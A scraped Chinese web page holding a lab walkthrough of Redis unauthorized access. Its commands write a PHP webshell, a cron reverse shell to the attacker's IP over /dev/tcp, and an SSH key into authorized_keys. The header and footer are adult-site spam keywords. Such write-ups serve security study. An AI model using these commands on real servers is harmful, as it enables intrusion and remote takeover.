成人性生交大片免费看视频r_亚洲综合极品香蕉久久网_在线视频免费观看一区_亚洲精品亚洲人成人网在线播放_国产精品毛片av_久久久久国产精品www_亚洲国产一区二区三区在线播_日韩一区二区三区四区区区_亚洲精品国产无套在线观_国产免费www

主頁(yè) > 知識(shí)庫(kù) > 關(guān)于Redis未授權(quán)訪問(wèn)的問(wèn)題

關(guān)于Redis未授權(quán)訪問(wèn)的問(wèn)題

熱門標(biāo)簽:鄭州人工智能電銷機(jī)器人系統(tǒng) 山東外呼銷售系統(tǒng)招商 宿遷便宜外呼系統(tǒng)平臺(tái) 十堰營(yíng)銷電銷機(jī)器人哪家便宜 貴州電銷卡外呼系統(tǒng) 日本中國(guó)地圖標(biāo)注 超呼電話機(jī)器人 魔獸2青云地圖標(biāo)注 北京400電話辦理收費(fèi)標(biāo)準(zhǔn)

漏洞原理

Redis 默認(rèn)情況下,會(huì)綁定在 0.0.0.0:6379,如果沒(méi)有進(jìn)行采用相關(guān)的策略,比如添加防火墻規(guī)則避免其他非信任來(lái)源 ip 訪問(wèn)等,這樣將會(huì)將 Redis 服務(wù)暴露到公網(wǎng)上,如果在沒(méi)有設(shè)置密碼認(rèn)證(一般為空)的情況下,會(huì)導(dǎo)致任意用戶在可以訪問(wèn)目標(biāo)服務(wù)器的情況下未授權(quán)訪問(wèn) Redis 以及讀取 Redis 的數(shù)據(jù)。攻擊者在未授權(quán)訪問(wèn) Redis 的情況下,利用 Redis 自身的提供的config 命令,可以進(jìn)行寫文件操作,攻擊者可以成功將自己的ssh公鑰寫入目標(biāo)服務(wù)器的 /root/.ssh文件夾的authotrized_keys 文件中,進(jìn)而可以使用對(duì)應(yīng)私鑰直接使用ssh服務(wù)登錄目標(biāo)服務(wù)器。

利用條件

  • redis綁定在 0.0.0.0:6379,且沒(méi)有進(jìn)行添加防火墻規(guī)則避免其他非信任來(lái)源 ip 訪問(wèn)等相關(guān)安全策略,直接暴露在公網(wǎng)
  • 沒(méi)有設(shè)置密碼認(rèn)證(一般為空),可以免密碼遠(yuǎn)程登錄redis服務(wù)

漏洞危害

  • 攻擊者無(wú)需認(rèn)證訪問(wèn)到內(nèi)部數(shù)據(jù),可能導(dǎo)致敏感信息泄露,黑客也可以惡意執(zhí)行flushall來(lái)清空所有數(shù)據(jù)
  • 攻擊者可通過(guò)eval執(zhí)行l(wèi)ua代碼,或通過(guò)數(shù)據(jù)備份功能往磁盤寫入后門文件
  • 最嚴(yán)重的情況,如果Redis以root身份運(yùn)行,黑客可以給root賬戶寫入SSH公鑰文件,直接通過(guò)SSH登錄受害服務(wù)器

漏洞復(fù)現(xiàn)

搭建測(cè)試環(huán)境

受害機(jī)Ubuntu 20.04

  1. 安裝php:sudo apt install php7.4-cli libapache2-mod-php
  2. 安裝apache2:sudo apt install apache2 。并啟動(dòng)apache服務(wù):sudo service apache2 start
  3. 安裝redis,環(huán)境需要4.x/5.x以下的redis版本,這里下載3.2版本的,并解壓、編譯:
$ wget http://download.redis.io/releases/redis-3.2.11.tar.gz
$ tar -zxvf redis-3.2.11.tar.gz
$ cd redis-3.2.11
$ make

如果make 時(shí)遇到以下報(bào)錯(cuò),需要安裝gcc,并設(shè)置啟動(dòng)參數(shù):

錯(cuò)誤信息如下:

/bin/sh: cc: command not found

解決辦法,安裝gcc:

sudo apt install gcc

然后設(shè)置make啟動(dòng)參數(shù)后即可運(yùn)行:

make MALLOC=libc

4.編譯完成后,進(jìn)入src目錄下,復(fù)制redis-cliredis-server/usr/bin/目錄下:

$ cd src
$ sudo cp redis-cli redis-server /usr/bin/

5.回到redis-3.2.11目錄中,復(fù)制redis.conf文件到/etc/目錄下:

$ cd ..
$ sudo cp redis.conf /etc/

使用sudo vim /etc/redis.conf 編輯配置文件,將61行的IP注釋起來(lái),表示外網(wǎng)可訪問(wèn),如下:


然后將80行的yes改為no,表示關(guān)閉保護(hù)模式,如下:


然后保存退出。

使用redis-server /etc/redis.conf啟動(dòng)redis服務(wù):

打開(kāi)一個(gè)新的終端,在窗口使用redis-cli 命令,測(cè)試能否正常連接redis:

使用quit退出redis命令行,然后在Ubuntu終端中開(kāi)啟ssh服務(wù),確保后面能使用ssh進(jìn)行連接:

$ sudo service ssh start

攻擊機(jī)Kali 2021.1

只要能連上redis即可,需要有redis-cli 命令,如果沒(méi)有redis,需要進(jìn)行安裝:
bash $ sudo apt install redis-tools

利用redis寫入webshell

利用條件

  • 服務(wù)器開(kāi)著web服務(wù)
  • redis有web目錄寫權(quán)限,可以往web路徑寫入文件

利用過(guò)程

測(cè)試使用Kali連接Ubuntu的redis服務(wù):

$ redis-cli -h 192.168.101.6

如果成功連接上受害機(jī),說(shuō)明受害機(jī)存在redis未授權(quán)訪問(wèn)漏洞。

redis可以寫入文件。使用config get dir 命令可以查看寫入文件的目錄,并且可以用來(lái)修改寫入文件的目錄。如下:


因?yàn)閣eb服務(wù)無(wú)法訪問(wèn)到/home目錄下的內(nèi)容,所以需要修改redis保存文件的路徑,將其修改到網(wǎng)站的根目錄下,也就是 默認(rèn)的 /var/www/html 目錄。因此redis需要具有對(duì)/var/www/html 寫入的權(quán)限,使用config set dir /var/www/html 來(lái)修改dir的值:

然后使用redis寫入文件:

$ config set dbfilename shell.php
$ set xxx "?php phpinfo(); ?>"
$ save

然而并不能寫入文件,結(jié)果如下:


具體原因是因?yàn)閞edis對(duì)web根目錄沒(méi)有寫入權(quán)限,這是一個(gè)比較重要的點(diǎn),也是能否利用未授權(quán)訪問(wèn)來(lái)getshell的因素之一。為了測(cè)試,此時(shí)需要手動(dòng)在受害機(jī)網(wǎng)站根目錄中,新建一個(gè)其他用戶具有可寫入權(quán)限的文件夾,然后再將redis保存文件的dir值修改為新建文件夾的路徑:



此時(shí)再次進(jìn)行寫入,可以看到已經(jīng)保存成功了:

成功寫入文件后可以在受害機(jī)中進(jìn)行查看:

現(xiàn)在在瀏覽器中訪問(wèn)這個(gè)頁(yè)面試試:

從上面的訪問(wèn)結(jié)果可以看出我們寫入的php代碼已經(jīng)成功執(zhí)行并返回。再次寫入文件,將一句話木馬寫入到目錄中:

訪問(wèn)webshell頁(yè)面:

使用蟻劍連接webshell:

利用redis反彈shell

原理:在攻擊機(jī)上開(kāi)啟nc反彈端口監(jiān)聽(tīng),通過(guò)redis未授權(quán)訪問(wèn)漏洞,寫入Linux定時(shí)計(jì)劃,反彈shell。

利用條件對(duì)/var/spool/cron文件夾有寫入權(quán)限

利用過(guò)程首先在攻擊機(jī)監(jiān)聽(tīng)一個(gè)端口:

$ nc -lvnp 6666

在攻擊機(jī)開(kāi)啟新的命令行窗口,連接受害機(jī)的redis服務(wù),然后執(zhí)行下面的命令:

$ set x "\n\n\n* * * * * bash -i > /dev/tcp/192.168.101.8/6666 0>1\n\n\n"
$ config set dir /var/spool/cron/
$ config set dbfilename root
$ save

注意此處的計(jì)劃任務(wù)命令,如果在Ubuntu中,是無(wú)法反彈shell的,原因是因?yàn)閡buntu會(huì)將redis寫入的緩存亂碼當(dāng)作命令來(lái)解釋,導(dǎo)致執(zhí)行不成功。而centos不會(huì)對(duì)亂碼進(jìn)行解釋,可以成功執(zhí)行反彈shell的命令。

可以在受害機(jī)查看文件是否保存成功:

但是在ubuntu下無(wú)法反彈shell,這是由于redis向任務(wù)計(jì)劃文件里寫內(nèi)容出現(xiàn)亂碼而導(dǎo)致的語(yǔ)法錯(cuò)誤,而亂碼是避免不了的,centos會(huì)忽略亂碼去執(zhí)行格式正確的任務(wù)計(jì)劃,而ubuntu并不會(huì)忽略這些亂碼,所以導(dǎo)致命令執(zhí)行失敗,因?yàn)樽约喝绻皇褂胷edis寫任務(wù)計(jì)劃文件,而是正常向/etc/cron.d目錄下寫任務(wù)計(jì)劃文件的話,命令是可以正常執(zhí)行的,所以還是亂碼的原因?qū)е旅畈荒苷?zhí)行,而這個(gè)問(wèn)題是不能解決的,因?yàn)槔胷edis未授權(quán)訪問(wèn)寫的任務(wù)計(jì)劃文件里都有亂碼,這些代碼來(lái)自redis的緩存數(shù)據(jù)。

利用redis寫入ssh公鑰

利用條件受害機(jī)必須有~/.ssh文件夾,無(wú)論是普通用戶還是root用戶,否則無(wú)法在redis中設(shè)置dir的值

直接使用~/.ssh是不行的,需要絕對(duì)路徑。

另一個(gè)條件就是需要知道家目錄的名稱,比如上面的/home/unravel/.ssh,必須知道unravel

利用過(guò)程首先在攻擊機(jī)生成ssh公鑰,用于連接受害機(jī)時(shí)來(lái)使用私鑰驗(yàn)證登陸:

$ ssh-keygen 

將公鑰開(kāi)頭和結(jié)尾添加兩行換行,并存儲(chǔ)為新的文本文件,用于redis在連接時(shí)寫入的內(nèi)容。添加兩個(gè)換行的原因是對(duì)redis緩存垃圾數(shù)據(jù)和公鑰的內(nèi)容分隔開(kāi)來(lái),以免ssh連接失敗。可以使用bash命令來(lái)完成這個(gè)操作:

(echo -e "\n\n";cat ~/.ssh/id_rsa.pub;echo -e "\n\n") > key.txt

使用攻擊機(jī)連接受害機(jī)時(shí)寫入變量x,x存儲(chǔ)攻擊機(jī)的公鑰:

cat key.txt | redis-cli -h 192.168.101.6 -x set x

使用攻擊機(jī)連接受害機(jī)redis,將寫入的文件路徑設(shè)置為/home/unravel/.ssh,并設(shè)置保存的文件名稱為authorized_keys

注意authorized_keys名稱是固定的,不能隨便改,否則連接不上ssh
bash $ config set dir /home/unravel/.ssh $ config set dbfilename authorized_keys $ save

然后在受害機(jī)文件中查看一下:

在攻擊機(jī)嘗試使用本地私鑰對(duì)受害機(jī)進(jìn)行連接:

$ ssh unravel@192.168.101.6 -i ~/.ssh/id_rsa

總結(jié)

Redis在實(shí)戰(zhàn)中算是比較常用的端口利用了。除了反彈shell的方法在測(cè)試的時(shí)候沒(méi)有實(shí)現(xiàn)getshell以外,還有一種主從復(fù)制的方式,后面有空補(bǔ)上。
參考鏈接:https://paper.seebug.org/975/

到此這篇關(guān)于Redis未授權(quán)訪問(wèn)的文章就介紹到這了,更多相關(guān)Redis未授權(quán)訪問(wèn)內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

您可能感興趣的文章:
  • Redis未授權(quán)訪問(wèn)配合SSH key文件利用詳解
  • 關(guān)于Redis未授權(quán)訪問(wèn)漏洞利用的介紹與修復(fù)建議
  • python腳本實(shí)現(xiàn)Redis未授權(quán)批量提權(quán)

標(biāo)簽:臺(tái)州 楊凌 果洛 北京 江蘇 大慶 吉安 朝陽(yáng)

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《關(guān)于Redis未授權(quán)訪問(wèn)的問(wèn)題》,本文關(guān)鍵詞  關(guān)于,Redis,未,授權(quán),訪問(wèn),;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《關(guān)于Redis未授權(quán)訪問(wèn)的問(wèn)題》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于關(guān)于Redis未授權(quán)訪問(wèn)的問(wèn)題的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    99久久伊人久久99| 七七久久电影网| 日韩av专区| 亚洲欧美色图视频| 二区三区在线播放| 国产超碰在线观看| 五月天综合在线| 日本高清视频在线播放| 九九热精品视频在线观看| 色香阁99久久精品久久久| 国产一级在线播放| 日韩av毛片在线观看| 毛茸茸多毛bbb毛多视频| 1024在线看片| 无码人妻精品一区二区蜜桃网站| 中文字幕第2页| 免费无码毛片一区二三区| 亚洲伊人春色| 国产又粗又硬又长又爽| 人妻互换一二三区激情视频| 欧美成人三级伦在线观看| 亚洲+小说+欧美+激情+另类| 日韩视频在线直播| 久久精品免费| 久久精品国产一区二区电影| 精品久久久久久中文字幕2017| 国产99久久久国产精品潘金| 久久久久九九九九| 四虎精品永久免费| 黄瓜视频污app| xxxx69hd| 一本久久综合亚洲鲁鲁五月天| 国产精品白浆流出视频| 国产精品久久久久久福利| 青青青草网站免费视频在线观看| 香蕉精品久久| 亚洲精品国产成人av在线| 色呦呦一区二区| 国产精品久久久久一区二区三区共| 3d动漫精品啪啪一区二区三区免费| 福利一区二区免费视频| 蜜桃免费在线| 成人动漫视频在线观看完整版| 暖暖日本在线观看| 国产日产精品一区二区三区| 国产传媒免费在线观看| 最新av中文字幕| 亚洲欧洲日本国产| 丝袜国产日韩另类美女| 中文在线免费观看| 成人3d动漫一区二区三区| 国产精品久久久久不卡| 国产成人精品久久一区二区小说| 国产精品一页| 亚洲欧美二区三区| 亚洲一级av无码毛片精品| 视频在线观看国产精品| 首页国产欧美日韩丝袜| 日韩欧美国产一二三区| 国产精欧美一区二区三区蓝颜男同| 国产真实老熟女无套内射| 黄色动漫免费看| 又黄又爽的视频在线观看| 欧美精品videos极品| 无人区乱码一区二区三区| 欧美精品粉嫩高潮一区二区| 美女被c出白浆| 精品在线视频一区二区| 欧美日韩国产成人在线观看| 国产精品aaa| 欧美性xxxx禁忌| 97视频人免费观看| 国产精品免费观看在线| 国产成人欧美在线观看| 国产精品亚洲欧美一级在线| 91杏吧porn蝌蚪| 国产福利在线看| 欧美成人做性视频在线播放| 亚洲最大免费| 欧美一区二区三区性视频| 97在线观看免费观看| 日韩精品―中文字幕| av免费网站在线| 91九色鹿精品国产综合久久香蕉| 欧美一级特黄aaaaaa大片在线观看| 在线中文字幕电影| 678在线观看视频| 91麻豆精品91久久久久同性| 日本伊人精品一区二区三区观看方式| 伊人伊成久久人综合网小说| 一区二区在线免费观看视频| 欧美另类精品xxxx孕妇| 男人午夜天堂| 一区二区三区高清视频在线观看| 天天伊人狠狠| 国产偷人爽久久久久久老妇app| 欧美极品欧美精品欧美图片| 男人的天堂av高清在线| 亚洲成人av福利| 一本大道久久a久久精品综合| 电影亚洲一区| 国产成人精品免费在线| 精品在线观看一区二区| 欧美乱人伦中文字幕在线| 亚洲国产视频一区| 亚洲国产va精品久久久不卡综合| 色国产精品一区在线观看| 亚洲精品国产精品乱码不99按摩| 男人和女人啪啪网站| 国产成人亚洲精品| 国产亚洲女人久久久久毛片| 欧美日韩久久一区| 亚洲乱码一区av黑人高潮| www.亚洲色图| 欧美 变态 另类 人妖| 欧美精品一区二区三区免费播放| 女人一区二区三区| 久久久久久久久久免费视频| 欧美欧美欧美欧美首页| 国产精品乱码久久久久久| 女人裸体性做爰全过| 美女黄视频在线观看| 日韩视频免费在线播放| 久草在线中文最新视频| 亚洲欧洲精品一区二区精品久久久| 欧美成人国产精品一区二区| 日本精品一区二区三区四区的功能| 欧美日韩一级二级三级| 亚洲女则毛耸耸bbw| 国产酒店精品激情| 亚洲精品网站在线播放gif| 午夜裸体女人视频网站在线观看| 蜜臀久久99精品久久久| 手机福利小视频在线播放| 成人国产精品久久久网站| 男女性杂交内射妇女bbwxz| 大桥未久av一区二区三区中文| 欧美这里有精品| 99视频热这里只有精品免费| 日韩一区免费观看| 久久精品视频亚洲| 免费黄色在线播放| 免费观看在线色综合| 国产三级av在线播放| 手机av在线免费| 日韩成人一区二区| 91亚洲国产成人精品性色| 中文字幕在线视频一区二区| 亚洲国产成人私人影院tom| 国产精品欧美久久久久天天影视| 不卡一二三区| 欧美性猛交xxxxxx富婆| 可以免费看av的网址| 亚洲网站一区| 一级α片免费看刺激高潮视频| 日本a在线免费观看| 日本一区二区黄色| 亚洲综合网站久久久| 天天色综合4| 国产精品无av码在线观看| 久久亚洲私人国产精品va媚药| 黄网站在线免费| 免费观看91视频大全| 性直播在线观看| www.毛片| 精品无码一区二区三区| 日韩欧美在线视频一区二区| 欧美色综合天天久久综合精品| 色女孩综合网| 国产精品久久久久久久9999| 操人在线观看| 成人精品毛片| 亚洲理伦在线| 国产欧美日韩亚州综合| 秋霞av亚洲一区二区三| 成人激情综合| 筱崎爱全乳无删减在线观看| 日本成人a视频| www.中文字幕久久久| 国产成人在线视频| 免费看美剧网站| 天天操天天舔天天射| 国产一区在线观看免费| 成人三级在线视频| 青青草在线观看视频| 狠狠色综合网| 嗯~啊~轻一点视频日本在线观看| 久久久久久久久久久久国产| 五月天婷婷综合| 欧美日韩一区二区在线观看| 欧美色图片你懂的| 国产乱人伦精品一区| 亚洲产国偷v产偷v自拍涩爱| 久久亚洲二区三区| 久久精品国产亚洲777| www免费在线观看| 亚洲国产精品久久久久久久| 精品一区二区在线免费观看| 久久精品国产精品亚洲精品色| 欧美精品videosbestsex另类| 亚洲精品成av人片天堂无码| 国产精品三级久久久久三级| 亚洲欧洲精品天堂一级| 草草浮力影院| 国产一级片久久| 九色porny丨精品自拍视频| 国产在线视频2019最新视频| 阿v天堂2014| 国产成人黄色片| 99热这里只有精品4| 高清视频一区二区三区四区| 亚洲一级Av无码毛片久久精品| 蜜桃视频污在线观看| 欧美日韩一区二区三区在线| 亚洲va欧美va国产综合久久| 女人被狂躁到高潮的免费| 欧美极品欧美精品欧美视频| 992tv快乐视频| 九色蝌蚪av新入口| 久9久9色综合| 亚洲国产一区二区久久久777| www.99热这里只有精品| 欧美高清69hd| 久久久精品麻豆| 久久久极品av| xxxx69·hdxxxxx| 亚洲第一狼人区| 日韩护士脚交太爽了| 妖精视频一区二区三区免费观看| 国产911网站| 日韩视频一区二区在线观看| 色呦呦在线视频| 91在线观看免费高清| 五月婷婷综合在线| 夫妻性生活毛片| 翁止熄痒禁伦短文合集免费视频| 人妻偷人精品一区二区三区| 国产在线观看第一页| 成人3d精品动漫精品一二三| 欧美精品尤物在线观看| 国产午夜三区视频在线| 天天综合色天天综合| 亚洲精品乱码久久久久久蜜桃麻豆| 韩国在线视频一区| 岛国一区二区| 免费看黄色的视频| 特黄特色欧美大片| 亚洲欧洲国产日韩精品| 国产精品 欧美精品| 欧美xxxx18性欧美| 欧美另类在线观看| 国产麻豆综合| 精国产品一区二区三区a片| 国产色产综合色产在线视频| 亚洲精品中文在线| gogo高清免费视频| 欧美激情综合色综合啪啪五月| 天天综合天天综合色| 精品视频导航| 国产精品成人观看视频国产奇米| 日韩国产精品一区二区| av成人在线电影| 大肉大捧一进一出好爽| 久久99在线观看| 国产乱人乱偷精品视频| 五月婷婷综合久久| 国产特黄级aaaaa片免| 中文字幕电影在线观看| 亚洲成色www久久网站| 亚洲一区二区在线播放| 久久国产精品亚洲| 国产电影一区在线| 久久久神马电影| 日韩熟女精品一区二区三区| 欧美一区二区三区电影| av最新在线观看| 国产精品亚洲一区二区在线观看| 黄色精品免费看| 国产精品久久一卡二卡| 国产精品16p| 国产精华一区| 97在线视频免费观看完整版| 欧美gv在线| 国模无码一区二区三区| 欧美精品午夜视频| 亚洲欧美色视频| 亚洲欧洲闷骚av少妇影院| 欧美综合亚洲图片综合区| 香蕉久久免费影视| 在线免费看av的网站| jizz免费看| 九九九九免费视频| 欧美男男大粗吊1069| 一本色道久久综合狠狠躁篇怎么玩| 国产精品久久久久久吹潮| 亚洲一区二区偷拍精品| 美乳少妇欧美精品| 国产美女玉足交| 污污网站在线观看视频| va婷婷在线免费观看| 黄色短视频在线观看| 国产一区二区三区在线免费观看| 亚洲成人激情视频| 中文字幕电影av| 亚洲婷婷噜噜| 日韩中文欧美在线| 国产韩日精品| 美女把尿口扒开让男人桶在线观看| 欧美日韩卡一卡二| 免费福利视频网站| 久久99精品久久久久久久青青日本| 国内性生活视频| 水中色av综合| 亚洲 国产 日韩 欧美| 欧美刺激性大交免费视频| 国产精品久久久久9999小说| 91久久国产| 欧美性xxxxxx| 欧美一级视频在线观看| 国产1区2区视频| 亚洲这里只有精品| 三上悠亚亚洲一区| 亚洲 小说区 图片区| 欧美在线观看一二区| 亚洲欧美日韩国产中文| 欧美美女一区二区在线观看| 国产黑丝在线观看| 欧美美女15p|